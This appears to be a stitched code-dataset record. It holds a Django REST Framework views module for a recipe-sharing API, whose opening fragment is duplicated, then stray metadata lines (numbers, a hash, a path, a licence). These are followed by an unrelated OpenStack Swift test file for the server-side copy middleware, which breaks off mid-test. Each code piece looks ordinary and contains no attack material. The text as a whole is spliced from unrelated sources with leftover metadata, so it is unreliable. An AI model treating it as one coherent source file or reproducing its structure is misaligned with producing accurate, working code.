Follow.objects.filter(user=user, author=author).exists(): return ('У вас еще нет этого пользователя в подписках', True, False) else: return (user, author, get_object_or_404(Follow, user=user, author=author)) return user, author @multi_method_decorator( names=['create', 'update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class TagViewSet(ModelViewSet): queryset = Tag.objects.all() serializer_class = serializers.TagSerializer permission_classes = (IsAdminOrReadOnly,) @multi_method_decorator( names=['create', 'update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class IngredientsViewSet(ModelViewSet): queryset = Ingredient.objects.all() serializer_class = serializers.IngredientSerializer permission_classes = (IsAdminOrReadOnly,) filter_backends = (filters.SearchFilter,) search_fields = ('name', ) @method_decorator( swagger_auto_schema( request_body=recipe_request_body, responses={201: serializers.RecipeSerializer} ), name='create' ) @method_decorator( swagger_auto_schema( request_body=recipe_request_body, responses={200: serializers.RecipeSerializer} ), name='update' ) @method_decorator( swagger_auto_schema(auto_schema=None), name='partial_update' ) class RecipeViewSet(ModelViewSet): queryset = Recipe.objects.all() serializer_class = serializers.RecipeSerializer pagination_class = LimitPagination permission_classes = (RecipePermission,) filter_backends = (GlobalFilterBackend,) filterset_fields = ('author', ) def get_serializer_class(self): if self.action == 'favorite': return serializers.FavoriteSerializer elif self.action == 'shopping_cart': return serializers.PurchaseSerializer return self.serializer_class @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer}) def favorite(self, request, pk=None): return self.alt_endpoint_create(request, pk) @favorite.mapping.delete def delete_favorite(self, request, pk=None): return self.alt_endpoint_delete(request, pk, favorite=True) @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer}) def shopping_cart(self, request, pk=None): return self.alt_endpoint_create(request, pk) @shopping_cart.mapping.delete def delete_shopping_cart(self, request, pk=None): return self.alt_endpoint_delete(request, pk, cart=True) @action(['get'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(auto_schema=EmptyAutoSchema, responses={200: 'Download', 401: 'NotAuthorized'}) def download_shopping_cart(self, request): ingredients = ( IngredientInRecipe.objects .select_related('ingredient', 'recipe') .prefetch_related('purchases') .filter(recipe__purchases__user=request.user) .values_list('ingredient__name', 'ingredient__measurement_unit') .annotate(amount=Sum('amount')) ) response = HttpResponse(content_type='text/csv') response['Content-Disposition'] = ('attachment;' 'filename="Your_shopping_list.csv"') writer = csv.writer(response) writer.writerow(['Ингредиент', 'Единица измерения', 'Количество']) for ingredient in ingredients: writer.writerow(ingredient) return response def alt_endpoint_create(self, request, pk): verdict, recipe, user = self.recipe_validate(request, pk) if not verdict: return recipe data = { 'user': user.id, 'recipe': recipe.id, } serializer = self.get_serializer(data=data, context={'request': request}) serializer.is_valid(raise_exception=True) serializer.save() return Response(serializer.data, status=status.HTTP_201_CREATED) def alt_endpoint_delete(self, request, pk, favorite=False, cart=False): verdict, obj = self.recipe_validate(request, pk, delete=True, favorite=favorite, cart=cart) if not verdict: return obj obj.delete() return Response(status=status.HTTP_204_NO_CONTENT) def recipe_validate(self, request, pk, delete=False, favorite=False, cart=False): user = request.user if not Recipe.objects.filter(id=pk).exists(): return False, Response({'error': 'Такого рецепта еще нет'}, status=status.HTTP_400_BAD_REQUEST), None recipe = get_object_or_404(Recipe, id=pk) if delete: model_answer = { 'favorite': (Favorite, 'избранном'), 'cart': (Purchase, 'списке покупок') } if favorite: model, answer = model_answer.get('favorite') if cart: model, answer = model_answer.get('cart') if not model.objects.filter(user=user, recipe=recipe).exists(): return False, Response( {'error': f'Такого рецепта еще нет в вашем {answer}'}, status=status.HTTP_400_BAD_REQUEST ) return True, get_object_or_404(model, user=user, recipe=recipe) return True, recipe, user
39.119454
79
0.655819
import csv from django.contrib.auth import get_user_model from django.db.models.aggregates import Sum from django.http.response import HttpResponse from django.utils.decorators import method_decorator from djoser.serializers import SetPasswordSerializer from djoser.views import TokenCreateView from drf_yasg.utils import swagger_auto_schema from rest_framework import filters, status from rest_framework.decorators import action from rest_framework.generics import get_object_or_404 from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from rest_framework.viewsets import ModelViewSet from api import serializers from api.decorators import multi_method_decorator from api.docs.schemas import (EmptyAutoSchema, follower_params, recipe_request_body) from api.filters import GlobalFilterBackend from api.pagination import FollowPagination, LimitPagination from api.permissions import (IsAdminOrReadIfAuthenticatedObjPerm, IsAdminOrReadOnly, RecipePermission) from food.models import Ingredient, IngredientInRecipe, Recipe, Tag from interactions.models import Favorite, Follow, Purchase User = get_user_model() class CustomTokenCreateView(TokenCreateView): def _action(self, serializer): response = super()._action(serializer) response.status_code = status.HTTP_201_CREATED return response @multi_method_decorator( names=['update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class CustomUserViewSet(ModelViewSet): queryset = User.objects.all().order_by('id') serializer_class = serializers.CustomUserSerializer pagination_class = LimitPagination permission_classes = (IsAdminOrReadIfAuthenticatedObjPerm,) def get_serializer_class(self): if self.action in ('list', 'retrieve', 'me'): return serializers.CustomUserGetSerializer elif self.action == 'set_password': return SetPasswordSerializer elif self.action == 'subscriptions': return serializers.SubscriptionsSerializer elif self.action == 'subscribe': return serializers.FollowSerializer return self.serializer_class @action(['get'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(auto_schema=EmptyAutoSchema) def me(self, request, pk=None): serializer = self.get_serializer(self.request.user) return Response(serializer.data, status=status.HTTP_200_OK) @action(['post'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(request_body=SetPasswordSerializer, responses={204: 'No Content'}) def set_password(self, request, *args, **kwargs): serializer = self.get_serializer(data=request.data) serializer.is_valid(raise_exception=True) self.request.user.set_password( serializer.validated_data['new_password'] ) self.request.user.save() return Response(status=status.HTTP_204_NO_CONTENT) @action(['get'], detail=False, pagination_class=FollowPagination, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.SubscriptionsSerializer}) def subscriptions(self, request): queryset = Follow.objects.filter(user=request.user) if not queryset.exists(): return Response({'error': 'Вы еще ни на кого не подписаны'}, status=status.HTTP_400_BAD_REQUEST) page = self.paginate_queryset(queryset) if page: serializer = self.get_serializer( page, many=True, context={'request': request} ) return self.get_paginated_response(serializer.data) serializer = self.get_serializer(queryset, many=True, context={'request': request}) return Response(serializer.data) @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(manual_parameters=follower_params, responses={201: serializers.SubscriptionsSerializer}) def subscribe(self, request, pk=None): user, author = self.following_validate(request, pk) if not author: return Response({'error': user}, status=status.HTTP_400_BAD_REQUEST) data = {'user': user.id, 'author': author.id} serializer = self.get_serializer( data=data, context={'request': request} ) serializer.is_valid(raise_exception=True) serializer.save() return Response(serializer.data, status=status.HTTP_201_CREATED) @subscribe.mapping.delete def delete_subscribe(self, request, pk=None): user, author, subscribe = self.following_validate(request, pk, delete=True) if not author or not subscribe: return Response({'error': user}, status=status.HTTP_400_BAD_REQUEST) subscribe.delete() return Response(status=status.HTTP_204_NO_CONTENT) def following_validate(self, request, pk, delete=False): user = request.user if not User.objects.filter(id=pk).exists(): if delete: return 'Такого пользователя еще нет', False, False return 'Такого пользователя еще нет', False author = get_object_or_404(User, id=pk) if delete: if not Follow.objects.filter(user=user, author=author).exists(): return ('У вас еще нет этого пользователя в подписках', True, False) else: return (user, author, get_object_or_404(Follow, user=user, author=author)) return user, author @multi_method_decorator( names=['create', 'update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class TagViewSet(ModelViewSet): queryset = Tag.objects.all() serializer_class = serializers.TagSerializer permission_classes = (IsAdminOrReadOnly,) @multi_method_decorator( names=['create', 'update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class IngredientsViewSet(ModelViewSet): queryset = Ingredient.objects.all() serializer_class = serializers.IngredientSerializer permission_classes = (IsAdminOrReadOnly,) filter_backends = (filters.SearchFilter,) search_fields = ('name', ) @method_decorator( swagger_auto_schema( request_body=recipe_request_body, responses={201: serializers.RecipeSerializer} ), name='create' ) @method_decorator( swagger_auto_schema( request_body=recipe_request_body, responses={200: serializers.RecipeSerializer} ), name='update' ) @method_decorator( swagger_auto_schema(auto_schema=None), name='partial_update' ) class RecipeViewSet(ModelViewSet): queryset = Recipe.objects.all() serializer_class = serializers.RecipeSerializer pagination_class = LimitPagination permission_classes = (RecipePermission,) filter_backends = (GlobalFilterBackend,) filterset_fields = ('author', ) def get_serializer_class(self): if self.action == 'favorite': return serializers.FavoriteSerializer elif self.action == 'shopping_cart': return serializers.PurchaseSerializer return self.serializer_class @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer}) def favorite(self, request, pk=None): return self.alt_endpoint_create(request, pk) @favorite.mapping.delete def delete_favorite(self, request, pk=None): return self.alt_endpoint_delete(request, pk, favorite=True) @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer}) def shopping_cart(self, request, pk=None): return self.alt_endpoint_create(request, pk) @shopping_cart.mapping.delete def delete_shopping_cart(self, request, pk=None): return self.alt_endpoint_delete(request, pk, cart=True) @action(['get'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(auto_schema=EmptyAutoSchema, responses={200: 'Download', 401: 'NotAuthorized'}) def download_shopping_cart(self, request): ingredients = ( IngredientInRecipe.objects .select_related('ingredient', 'recipe') .prefetch_related('purchases') .filter(recipe__purchases__user=request.user) .values_list('ingredient__name', 'ingredient__measurement_unit') .annotate(amount=Sum('amount')) ) response = HttpResponse(content_type='text/csv') response['Content-Disposition'] = ('attachment;' 'filename="Your_shopping_list.csv"') writer = csv.writer(response) writer.writerow(['Ингредиент', 'Единица измерения', 'Количество']) for ingredient in ingredients: writer.writerow(ingredient) return response def alt_endpoint_create(self, request, pk): verdict, recipe, user = self.recipe_validate(request, pk) if not verdict: return recipe data = { 'user': user.id, 'recipe': recipe.id, } serializer = self.get_serializer(data=data, context={'request': request}) serializer.is_valid(raise_exception=True) serializer.save() return Response(serializer.data, status=status.HTTP_201_CREATED) def alt_endpoint_delete(self, request, pk, favorite=False, cart=False): verdict, obj = self.recipe_validate(request, pk, delete=True, favorite=favorite, cart=cart) if not verdict: return obj obj.delete() return Response(status=status.HTTP_204_NO_CONTENT) def recipe_validate(self, request, pk, delete=False, favorite=False, cart=False): user = request.user if not Recipe.objects.filter(id=pk).exists(): return False, Response({'error': 'Такого рецепта еще нет'}, status=status.HTTP_400_BAD_REQUEST), None recipe = get_object_or_404(Recipe, id=pk) if delete: model_answer = { 'favorite': (Favorite, 'избранном'), 'cart': (Purchase, 'списке покупок') } if favorite: model, answer = model_answer.get('favorite') if cart: model, answer = model_answer.get('cart') if not model.objects.filter(user=user, recipe=recipe).exists(): return False, Response( {'error': f'Такого рецепта еще нет в вашем {answer}'}, status=status.HTTP_400_BAD_REQUEST ) return True, get_object_or_404(model, user=user, recipe=recipe) return True, recipe, user
true
true
f705de9ae40aeb7ac96605765acb1cf9903cb9e3
70,522
py
Python
test/unit/common/middleware/test_copy.py
gyaozhou/swift-read
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
[ "Apache-2.0" ]
null
null
null
test/unit/common/middleware/test_copy.py
gyaozhou/swift-read
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
[ "Apache-2.0" ]
null
null
null
test/unit/common/middleware/test_copy.py
gyaozhou/swift-read
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # Copyright (c) 2015 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import mock import unittest from hashlib import md5 from six.moves import urllib from swift.common import swob from swift.common.middleware import copy from swift.common.storage_policy import POLICIES from swift.common.swob import Request, HTTPException from swift.common.utils import closing_if_possible from test.unit import patch_policies, debug_logger, FakeMemcache, FakeRing from test.unit.common.middleware.helpers import FakeSwift from test.unit.proxy.controllers.test_obj import set_http_connect, \ PatchedObjControllerApp class TestCopyConstraints(unittest.TestCase): def test_validate_copy_from(self): req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'c/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'c/subdir/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'subdir/o2') req = Request.blank( '/v/a/c/o', headers={'x-copy-from': '/c/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') def test_validate_bad_copy_from(self): req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'bad_object'}) self.assertRaises(HTTPException, copy._check_copy_from_header, req) def test_validate_destination(self): req = Request.blank( '/v/a/c/o', headers={'destination': 'c/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') req = Request.blank( '/v/a/c/o', headers={'destination': 'c/subdir/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'subdir/o2') req = Request.blank( '/v/a/c/o', headers={'destination': '/c/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') def test_validate_bad_destination(self): req = Request.blank( '/v/a/c/o', headers={'destination': 'bad_object'}) self.assertRaises(HTTPException, copy._check_destination_header, req) class TestServerSideCopyMiddleware(unittest.TestCase): def setUp(self): self.app = FakeSwift() self.ssc = copy.filter_factory({})(self.app) self.ssc.logger = self.app.logger def tearDown(self): self.assertEqual(self.app.unclosed_requests, {}) def call_app(self, req, app=None, expect_exception=False): if app is None: app = self.app self.authorized = [] def authorize(req): self.authorized.append(req) if 'swift.authorize' not in req.environ: req.environ['swift.authorize'] = authorize req.headers.setdefault("User-Agent", "Bruce Wayne") status = [None] headers = [None] def start_response(s, h, ei=None): status[0] = s headers[0] = h body_iter = app(req.environ, start_response) body = '' caught_exc = None try: # appease the close-checker with closing_if_possible(body_iter): for chunk in body_iter: body += chunk except Exception as exc: if expect_exception: caught_exc = exc else: raise if expect_exception: return status[0], headers[0], body, caught_exc else: return status[0], headers[0], body def call_ssc(self, req, **kwargs): return self.call_app(req, app=self.ssc, **kwargs) def assertRequestEqual(self, req, other): self.assertEqual(req.method, other.method) self.assertEqual(req.path, other.path) def test_no_object_in_path_pass_through(self): self.app.register('PUT', '/v1/a/c', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c', method='PUT') status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertEqual(len(self.authorized), 1) self.assertRequestEqual(req, self.authorized[0]) def test_object_pass_through_methods(self): for method in ['DELETE', 'GET', 'HEAD', 'REPLICATE']: self.app.register(method, '/v1/a/c/o', swob.HTTPOk, {}) req = Request.blank('/v1/a/c/o', method=method) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') self.assertEqual(len(self.authorized), 1) self.assertRequestEqual(req, self.authorized[0]) self.assertNotIn('swift.orig_req_method', req.environ) def test_basic_put_with_x_copy_from(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) self.assertEqual(self.app.swift_sources[0], 'SSC') self.assertEqual(self.app.swift_sources[1], 'SSC') # For basic test cases, assert orig_req_method behavior self.assertNotIn('swift.orig_req_method', req.environ) def test_static_large_object_manifest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'X-Static-Large-Object': 'True', 'Etag': 'should not be sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o2?multipart-manifest=put', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2?multipart-manifest=get', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(2, len(self.app.calls)) self.assertEqual('GET', self.app.calls[0][0]) get_path, qs = self.app.calls[0][1].split('?') params = urllib.parse.parse_qs(qs) self.assertDictEqual( {'format': ['raw'], 'multipart-manifest': ['get']}, params) self.assertEqual(get_path, '/v1/a/c/o') self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o2?multipart-manifest=put')) req_headers = self.app.headers[1] self.assertNotIn('X-Static-Large-Object', req_headers) self.assertNotIn('Etag', req_headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) def test_static_large_object(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'X-Static-Large-Object': 'True', 'Etag': 'should not be sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o2')]) req_headers = self.app.headers[1] self.assertNotIn('X-Static-Large-Object', req_headers) self.assertNotIn('Etag', req_headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) def test_basic_put_with_x_copy_from_across_container(self): self.app.register('GET', '/v1/a/c1/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c2/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c1/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c2/o2', self.authorized[1].path) def test_basic_put_with_x_copy_from_across_container_and_account(self): self.app.register('GET', '/v1/a1/c1/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {}, 'passed') req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o1') in headers) self.assertTrue(('X-Copied-From-Account', 'a1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c1/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path) def test_copy_non_zero_content_length(self): req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '10', 'X-Copy-From': 'c1/o1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '400 Bad Request') def test_copy_non_zero_content_length_with_account(self): req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '10', 'X-Copy-From': 'c1/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '400 Bad Request') def test_copy_with_slashes_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o/o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_slashes_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a1/c1/o/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o/o1') in headers) self.assertTrue(('X-Copied-From-Account', 'a1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c1/o/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path) def test_copy_with_spaces_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) # space in soure path req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o%20o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o o2', path) self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_spaces_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) # space in soure path req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o%20o2', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o o2', path) self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_leading_slash_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) # repeat tests with leading / req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_leading_slash_in_x_copy_from_and_account(self): # repeat tests with leading / self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_leading_slash_and_slashes_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o/o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o/o2', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_leading_slash_and_slashes_in_x_copy_from_acct(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o/o2', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o/o2', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_no_object_in_x_copy_from(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_with_no_object_in_x_copy_from_and_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_with_bad_x_copy_from_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': '/i/am/bad'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') def test_copy_server_error_reading_source_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) 